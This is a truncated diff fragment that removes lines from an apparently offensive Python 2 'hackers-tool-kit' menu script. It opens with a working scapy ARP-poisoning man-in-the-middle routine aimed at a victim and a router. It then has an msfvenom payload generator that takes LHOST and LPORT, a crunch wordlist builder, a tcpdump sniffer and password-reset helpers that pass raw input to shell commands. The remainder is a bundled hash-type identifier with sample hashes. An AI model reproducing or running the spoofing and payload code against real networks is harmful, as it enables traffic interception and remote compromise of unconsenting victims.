Enter Victim IP: ") - gateIP = raw_input("[*] Enter Router IP: ") - except KeyboardInterrupt: - print "\n[*] User Requested Shutdown" - print "[*] Exiting..." - os.system("clear") - mainbanner() - - print "\n[*] Enabling IP Forwarding...\n" - os.system("echo 1 > /proc/sys/net/ipv4/ip_forward") - - def get_mac(IP): - conf.verb = 0 - ans, unans = srp(Ether(dst = "ff:ff:ff:ff:ff:ff")/ARP(pdst = IP), timeout = 2, iface = interface, inter = 0.1) - for snd,rcv in ans: - return rcv.sprintf(r"%Ether.src%") - - def reARP(): - - print "\n[*] Restoring Targets..." - victimMAC = get_mac(victimIP) - gateMAC = get_mac(gateIP) - send(ARP(op = 2, pdst = gateIP, psrc = victimIP, hwdst = "ff:ff:ff:ff:ff:ff", hwsrc = victimMAC), count = 7) - send(ARP(op = 2, pdst = victimIP, psrc = gateIP, hwdst = "ff:ff:ff:ff:ff:ff", hwsrc = gateMAC), count = 7) - print "[*] Disabling IP Forwarding..." - os.system("echo 0 > /proc/sys/net/ipv4/ip_forward") - print "[*] Shutting Down..." - os.system("clear") - mainbanner() - - def trick(gm, vm): - send(ARP(op = 2, pdst = victimIP, psrc = gateIP, hwdst= vm)) - send(ARP(op = 2, pdst = gateIP, psrc = victimIP, hwdst= gm)) - - def mitm(): - try: - victimMAC = get_mac(victimIP) - except Exception: - os.system("echo 0 > /proc/sys/net/ipv4/ip_forward") - print "[!] Couldn't Find Victim MAC Address" - print "[!] Exiting..." - os.system("clear") - mainbanner() - try: - gateMAC = get_mac(gateIP) - except Exception: - os.system("echo 0 > /proc/sys/net/ipv4/ip_forward") - print "[!] Couldn't Find Gateway MAC Address" - print "[!] Exiting..." - os.system("clear") - mainbanner() - print "[*] Poisoning Targets..." - while 1: - try: - trick(gateMAC, victimMAC) - time.sleep(1.5) - except KeyboardInterrupt: - reARP() - break - mitm() -def sslscan(): - j = raw_input('Enter Target: ') - a = 'sslscan {0}'.format(j) - os.system(a) -def payload(): - os.system("cat /root/hackers-tool-kit/tools/payloads.txt") - print "\n" - f = raw_input("Select Payload: ") - l = raw_input("LHOST: ") - c = raw_input("LPORT: ") - os.system("cat /root/hackers-tool-kit/tools/formats.txt") - s = raw_input("Format: ") - h = raw_input("File Name: ") - a = 'msfvenom -p {0} LHOST={1} LPORT={2} -f {3} -o /root/{4}.{5}'.format(f,l,c,s,h,s) - os.system(a) -def crunch(): - print "minimal number of characters" - j = raw_input("[CRUNCH]: ") - print "maximum number of characters" - k = raw_input("[CRUNCH]: ") - print "what characters should be in it" - b = raw_input("[CRUNCH]: ") - print "name of file" - s = raw_input("[CRUNCH]: ") - a = 'crunch {0} {1} {2} -o /root/hackers-tool-kit/wordlists/{3}'.format(j,k,b,s) - os.system(a) - print Y+"wordlist saved to \033[0m/root/hackers-tool-kit/wordlists/" + s -def traff(): - os.system("iwconfig") - s = raw_input("Select Interface: ") - os.system("tcpdump -i " + s) -def resa(): - j = raw_input("USERNAME: ") - k = raw_input("NEW PASSWORD: ") - print "are you sure?" - q = raw_input("[y/n]: ") - if q == "n": - os.system("clear") - mainbanner() - if q == "y": - a = 'echo "{0}:{1}" | chpasswd'.format(j,k) - print "password for {0} has been reset".format(j) -def resu(): - j = raw_input("PASSWORD: ") - print "are you sure?" - q = raw_input("[y/n]: ") - if q == "n": - os.system("clear") - mainbanner() - if q == "y": - a = 'passwd {0}'.format(j) - print "unix password has been reset".format(j) -def hashid(): - #!/usr/bin/python - # encoding: utf-8 - # Hash Identifier v1.1 - # By Zion3R - # www.Blackploit.com - # Root@Blackploit.com - - logo=''' ######################################################################### - # __ __ __ ______ _____ # - # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ # - # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ # - # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ # - # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ # - # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ # - # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.1 # - # By Zion3R # - # www.Blackploit.com # - # Root@Blackploit.com # - #########################################################################''' - - algorithms={"102020":"ADLER-32", "102040":"CRC-32", "102060":"CRC-32B", "101020":"CRC-16", "101040":"CRC-16-CCITT", "104020":"DES(Unix)", "101060":"FCS-16", "103040":"GHash-32-3", "103020":"GHash-32-5", "115060":"GOST R 34.11-94", "109100":"Haval-160", "109200":"Haval-160(HMAC)", "110040":"Haval-192", "110080":"Haval-192(HMAC)", "114040":"Haval-224", "114080":"Haval-224(HMAC)", "115040":"Haval-256", "115140":"Haval-256(HMAC)", "107080":"Lineage II C4", "106025":"Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))", "102080":"XOR-32", "105060":"MD5(Half)", "105040":"MD5(Middle)", "105020":"MySQL", "107040":"MD5(phpBB3)", "107060":"MD5(Unix)", "107020":"MD5(Wordpress)", "108020":"MD5(APR)", "106160":"Haval-128", "106165":"Haval-128(HMAC)", "106060":"MD2", "106120":"MD2(HMAC)", "106040":"MD4", "106100":"MD4(HMAC)", "106020":"MD5", "106080":"MD5(HMAC)", "106140":"MD5(HMAC(Wordpress))", "106029":"NTLM", "106027":"RAdmin v2.x", "106180":"RipeMD-128", "106185":"RipeMD-128(HMAC)", "106200":"SNEFRU-128", "106205":"SNEFRU-128(HMAC)", "106220":"Tiger-128", "106225":"Tiger-128(HMAC)", "106240":"md5($pass.$salt)", "106260":"md5($salt.'-'.md5($pass))", "106280":"md5($salt.$pass)", "106300":"md5($salt.$pass.$salt)", "106320":"md5($salt.$pass.$username)", "106340":"md5($salt.md5($pass))", "106360":"md5($salt.md5($pass).$salt)", "106380":"md5($salt.md5($pass.$salt))", "106400":"md5($salt.md5($salt.$pass))", "106420":"md5($salt.md5(md5($pass).$salt))", "106440":"md5($username.0.$pass)", "106460":"md5($username.LF.$pass)", "106480":"md5($username.md5($pass).$salt)", "106500":"md5(md5($pass))", "106520":"md5(md5($pass).$salt)", "106540":"md5(md5($pass).md5($salt))", "106560":"md5(md5($salt).$pass)", "106580":"md5(md5($salt).md5($pass))", "106600":"md5(md5($username.$pass).$salt)", "106620":"md5(md5(md5($pass)))", "106640":"md5(md5(md5(md5($pass))))", "106660":"md5(md5(md5(md5(md5($pass)))))", "106680":"md5(sha1($pass))", "106700":"md5(sha1(md5($pass)))", "106720":"md5(sha1(md5(sha1($pass))))", "106740":"md5(strtoupper(md5($pass)))", "109040":"MySQL5 - SHA-1(SHA-1($pass))", "109060":"MySQL 160bit - SHA-1(SHA-1($pass))", "109180":"RipeMD-160(HMAC)", "109120":"RipeMD-160", "109020":"SHA-1", "109140":"SHA-1(HMAC)", "109220":"SHA-1(MaNGOS)", "109240":"SHA-1(MaNGOS2)", "109080":"Tiger-160", "109160":"Tiger-160(HMAC)", "109260":"sha1($pass.$salt)", "109280":"sha1($salt.$pass)", "109300":"sha1($salt.md5($pass))", "109320":"sha1($salt.md5($pass).$salt)", "109340":"sha1($salt.sha1($pass))", "109360":"sha1($salt.sha1($salt.sha1($pass)))", "109380":"sha1($username.$pass)", "109400":"sha1($username.$pass.$salt)", "1094202":"sha1(md5($pass))", "109440":"sha1(md5($pass).$salt)", "109460":"sha1(md5(sha1($pass)))", "109480":"sha1(sha1($pass))", "109500":"sha1(sha1($pass).$salt)", "109520":"sha1(sha1($pass).substr($pass,0,3))", "109540":"sha1(sha1($salt.$pass))", "109560":"sha1(sha1(sha1($pass)))", "109580":"sha1(strtolower($username).$pass)", "110020":"Tiger-192", "110060":"Tiger-192(HMAC)", "112020":"md5($pass.$salt) - Joomla", "113020":"SHA-1(Django)", "114020":"SHA-224", "114060":"SHA-224(HMAC)", "115080":"RipeMD-256", "115160":"RipeMD-256(HMAC)", "115100":"SNEFRU-256", "115180":"SNEFRU-256(HMAC)", "115200":"SHA-256(md5($pass))", "115220":"SHA-256(sha1($pass))", "115020":"SHA-256", "115120":"SHA-256(HMAC)", "116020":"md5($pass.$salt) - Joomla", "116040":"SAM - (LM_hash:NT_hash)", "117020":"SHA-256(Django)", "118020":"RipeMD-320", "118040":"RipeMD-320(HMAC)", "119020":"SHA-384", "119040":"SHA-384(HMAC)", "120020":"SHA-256", "121020":"SHA-384(Django)", "122020":"SHA-512", "122060":"SHA-512(HMAC)", "122040":"Whirlpool", "122080":"Whirlpool(HMAC)"} - - # hash.islower() minusculas - # hash.isdigit() numerico - # hash.isalpha() letras - # hash.isalnum() alfanumerico - - def CRC16(): - hs='4607' - if len(hash)==len(hs) and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101020") - def CRC16CCITT(): - hs='3d08' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101040") - def FCS16(): - hs='0e5b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101060") - - def CRC32(): - hs='b33fd057' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102040") - def ADLER32(): - hs='0607cb42' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102020") - def CRC32B(): - hs='b764a0d9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102060") - def XOR32(): - hs='0000003f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102080") - - def GHash323(): - hs='80000000' - if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("103040") - def GHash325(): - hs='85318985' - if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("103020") - - def DESUnix(): - hs='ZiY8YtDKXJwYQ' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False: - jerar.append("104020") - - def MD5Half(): - hs='ae11fd697ec92c7c' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105060") - def MD5Middle(): - hs='7ec92c7c98de3fac' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105040") - def MySQL(): - hs='63cea4673fd25f46' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105020") - - def DomainCachedCredentials(): - hs='f42005ec1afe77967cbc83dce1b4d714' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106025") - def Haval128(): - hs='d6e3ec49aa0f138a619f27609022df10' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106160") - def Haval128HMAC(): - hs='3ce8b0ffd75bc240fc7d967729cd6637' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106165") - def MD2(): - hs='08bbef4754d98806c373f2cd7d9a43c4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106060") - def MD2HMAC(): - hs='4b61b72ead2b0eb0fa3b8a56556a6dca' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106120") - def MD4(): - hs='a2acde400e61410e79dacbdfc3413151' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106040") - def MD4HMAC(): - hs='6be20b66f2211fe937294c1c95d1cd4f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106100") - def MD5(): - hs='ae11fd697ec92c7c98de3fac23aba525' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106020") - def MD5HMAC(): - hs='d57e43d2c7e397bf788f66541d6fdef9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106080") - def MD5HMACWordpress(): - hs='3f47886719268dfa83468630948228f6' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106140") - def NTLM(): - hs='cc348bace876ea440a28ddaeb9fd3550' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106029") - def RAdminv2x(): - hs='baea31c728cbf0cd548476aa687add4b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106027") - def RipeMD128(): - hs='4985351cd74aff0abc5a75a0c8a54115' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106180") - def RipeMD128HMAC(): - hs='ae1995b931cf4cbcf1ac6fbf1a83d1d3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106185") - def SNEFRU128(): - hs='4fb58702b617ac4f7ca87ec77b93da8a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106200") - def SNEFRU128HMAC(): - hs='59b2b9dcc7a9a7d089cecf1b83520350' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106205") - def Tiger128(): - hs='c086184486ec6388ff81ec9f23528727' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106220") - def Tiger128HMAC(): - hs='c87032009e7c4b2ea27eb6f99723454b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106225") - def md5passsalt(): - hs='5634cc3b922578434d6e9342ff5913f7' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106240") - def md5saltmd5pass(): - hs='245c5763b95ba42d4b02d44bbcd916f1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106260") - def md5saltpass(): - hs='22cc5ce1a1ef747cd3fa06106c148dfa' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106280") - def md5saltpasssalt(): - hs='469e9cdcaff745460595a7a386c4db0c' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106300") - def md5saltpassusername(): - hs='9ae20f88189f6e3a62711608ddb6f5fd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106320") - def md5saltmd5pass(): - hs='aca2a052962b2564027ee62933d2382f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106340") - def md5saltmd5passsalt(): - hs='de0237dc03a8efdf6552fbe7788b2fdd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106360") - def md5saltmd5passsalt(): - hs='5b8b12ca69d3e7b2a3e2308e7bef3e6f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106380") - def md5saltmd5saltpass(): - hs='d8f3b3f004d387086aae24326b575b23' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106400") - def md5saltmd5md5passsalt(): - hs='81f181454e23319779b03d74d062b1a2' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106420") - def md5username0pass(): - hs='e44a60f8f2106492ae16581c91edb3ba' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106440") - def md5usernameLFpass(): - hs='654741780db415732eaee12b1b909119' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106460") - def md5usernamemd5passsalt(): - hs='954ac5505fd1843bbb97d1b2cda0b98f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106480") - def md5md5pass(): - hs='a96103d267d024583d5565436e52dfb3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106500") - def md5md5passsalt(): - hs='5848c73c2482d3c2c7b6af134ed8dd89' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106520") - def md5md5passmd5salt(): - hs='8dc71ef37197b2edba02d48c30217b32' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106540") - def md5md5saltpass(): - hs='9032fabd905e273b9ceb1e124631bd67' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106560") - def md5md5saltmd5pass(): - hs='8966f37dbb4aca377a71a9d3d09cd1ac' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106580") - def md5md5usernamepasssalt(): - hs='4319a3befce729b34c3105dbc29d0c40' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106600") - def md5md5md5pass(): - hs='ea086739755920e732d0f4d8c1b6ad8d' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106620") - def md5md5md5md5pass(): - hs='02528c1f2ed8ac7d83fe76f3cf1c133f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106640") - def md5md5md5md5md5pass(): - hs='4548d2c062933dff53928fd4ae427fc0' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106660") - def md5sha1pass(): - hs='cb4ebaaedfd536d965c452d9569a6b1e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106680") - def md5sha1md5pass(): - hs='099b8a59795e07c334a696a10c0ebce0' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106700") - def md5sha1md5sha1pass(): - hs='06e4af76833da7cc138d90602ef80070' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106720") - def md5strtouppermd5pass(): - hs='519de146f1a658ab5e5e2aa9b7d2eec8' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106740") - - def LineageIIC4(): - hs='0x49a57f66bd3d5ba6abda5579c264a0e4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True and hash[0:2].find('0x')==0: - jerar.append("107080") - def MD5phpBB3(): - hs='$H$9kyOtE8CDqMJ44yfn9PFz2E.L2oVzL1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$H$')==0: - jerar.append("107040") - def MD5Unix(): - hs='$1$cTuJH0Ju$1J8rI.mJReeMvpKUZbSlY/' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$1$')==0: - jerar.append("107060") - def MD5Wordpress(): - hs='$P$BiTOhOj3ukMgCci2juN0HRbCdDRqeh.' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$P$')==0: - jerar.append("107020") - - def MD5APR(): - hs='$apr1$qAUKoKlG$3LuCncByN76eLxZAh/Ldr1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash[0:4].find('$apr')==0: - jerar.append("108020") - - def Haval160(): - hs='a106e921284dd69dad06192a4411ec32fce83dbb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109100") - def Haval160HMAC(): - hs='29206f83edc1d6c3f680ff11276ec20642881243' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109200") - def MySQL5(): - hs='9bb2fb57063821c762cc009f7584ddae9da431ff' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109040") - def MySQL160bit(): - hs='*2470c0c06dee42fd1618bb99005adca2ec9d1e19' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:1].find('*')==0: - jerar.append("109060") - def RipeMD160(): - hs='dc65552812c66997ea7320ddfb51f5625d74721b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109120") - def RipeMD160HMAC(): - hs='ca28af47653b4f21e96c1235984cb50229331359' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109180") - def SHA1(): - hs='4a1d4dbc1e193ec3ab2e9213876ceb8f4db72333' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109020") - def SHA1HMAC(): - hs='6f5daac3fee96ba1382a09b1ba326ca73dccf9e7' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109140") - def SHA1MaNGOS(): - hs='a2c0cdb6d1ebd1b9f85c6e25e0f8732e88f02f96' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109220") - def SHA1MaNGOS2(): - hs='644a29679136e09d0bd99dfd9e8c5be84108b5fd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109240") - def Tiger160(): - hs='c086184486ec6388ff81ec9f235287270429b225' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109080") - def Tiger160HMAC(): - hs='6603161719da5e56e1866e4f61f79496334e6a10' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109160") - def sha1passsalt(): - hs='f006a1863663c21c541c8d600355abfeeaadb5e4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109260") - def sha1saltpass(): - hs='299c3d65a0dcab1fc38421783d64d0ecf4113448' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109280") - def sha1saltmd5pass(): - hs='860465ede0625deebb4fbbedcb0db9dc65faec30' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109300") - def sha1saltmd5passsalt(): - hs='6716d047c98c25a9c2cc54ee6134c73e6315a0ff' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109320") - def sha1saltsha1pass(): - hs='58714327f9407097c64032a2fd5bff3a260cb85f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109340") - def sha1saltsha1saltsha1pass(): - hs='cc600a2903130c945aa178396910135cc7f93c63' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109360") - def sha1usernamepass(): - hs='3de3d8093bf04b8eb5f595bc2da3f37358522c9f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109380") - def sha1usernamepasssalt(): - hs='00025111b3c4d0ac1635558ce2393f77e94770c5' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109400") - def sha1md5pass(): - hs='fa960056c0dea57de94776d3759fb555a15cae87' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("1094202") - def sha1md5passsalt(): - hs='1dad2b71432d83312e61d25aeb627593295bcc9a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109440") - def sha1md5sha1pass(): - hs='8bceaeed74c17571c15cdb9494e992db3c263695' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109460") - def sha1sha1pass(): - hs='3109b810188fcde0900f9907d2ebcaa10277d10e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109480") - def sha1sha1passsalt(): - hs='780d43fa11693b61875321b6b54905ee488d7760' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109500") - def sha1sha1passsubstrpass03(): - hs='5ed6bc680b59c580db4a38df307bd4621759324e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109520") - def sha1sha1saltpass(): - hs='70506bac605485b4143ca114cbd4a3580d76a413' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109540") - def sha1sha1sha1pass(): - hs='3328ee2a3b4bf41805bd6aab8e894a992fa91549' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109560") - def sha1strtolowerusernamepass(): - hs='79f575543061e158c2da3799f999eb7c95261f07' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109580") - - def Haval192(): - hs='cd3a90a3bebd3fa6b6797eba5dab8441f16a7dfa96c6e641' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110040") - def Haval192HMAC(): - hs='39b4d8ecf70534e2fd86bb04a877d01dbf9387e640366029' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110080") - def Tiger192(): - hs='c086184486ec6388ff81ec9f235287270429b2253b248a70' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110020") - def Tiger192HMAC(): - hs='8e914bb64353d4d29ab680e693272d0bd38023afa3943a41' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110060") - - def MD5passsaltjoomla1(): - hs='35d1c0d69a2df62be2df13b087343dc9:BeKMviAfcXeTPTlX' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: - jerar.append("112020") - - def SHA1Django(): - hs='sha1$Zion3R$299c3d65a0dcab1fc38421783d64d0ecf4113448' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:5].find('sha1$')==0: - jerar.append("113020") - - def Haval224(): - hs='f65d3c0ef6c56f4c74ea884815414c24dbf0195635b550f47eac651a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114040") - def Haval224HMAC(): - hs='f10de2518a9f7aed5cf09b455112114d18487f0c894e349c3c76a681' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114080") - def SHA224(): - hs='e301f414993d5ec2bd1d780688d37fe41512f8b57f6923d054ef8e59' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114020") - def SHA224HMAC(): - hs='c15ff86a859892b5e95cdfd50af17d05268824a6c9caaa54e4bf1514' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114060") - - def SHA256(): - hs='2c740d20dab7f14ec30510a11f8fd78b82bc3a711abe8a993acdb323e78e6d5e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115020") - def SHA256HMAC(): - hs='d3dd251b7668b8b6c12e639c681e88f2c9b81105ef41caccb25fcde7673a1132' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115120") - def Haval256(): - hs='7169ecae19a5cd729f6e9574228b8b3c91699175324e6222dec569d4281d4a4a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115040") - def Haval256HMAC(): - hs='6aa856a2cfd349fb4ee781749d2d92a1ba2d38866e337a4a1db907654d4d4d7a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115140") - def GOSTR341194(): - hs='ab709d384cce5fda0793becd3da0cb6a926c86a8f3460efb471adddee1c63793' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115060") - def RipeMD256(): - hs='5fcbe06df20ce8ee16e92542e591bdea706fbdc2442aecbf42c223f4461a12af' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115080") - def RipeMD256HMAC(): - hs='43227322be1b8d743e004c628e0042184f1288f27c13155412f08beeee0e54bf' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115160") - def SNEFRU256(): - hs='3a654de48e8d6b669258b2d33fe6fb179356083eed6ff67e27c5ebfa4d9732bb' - if 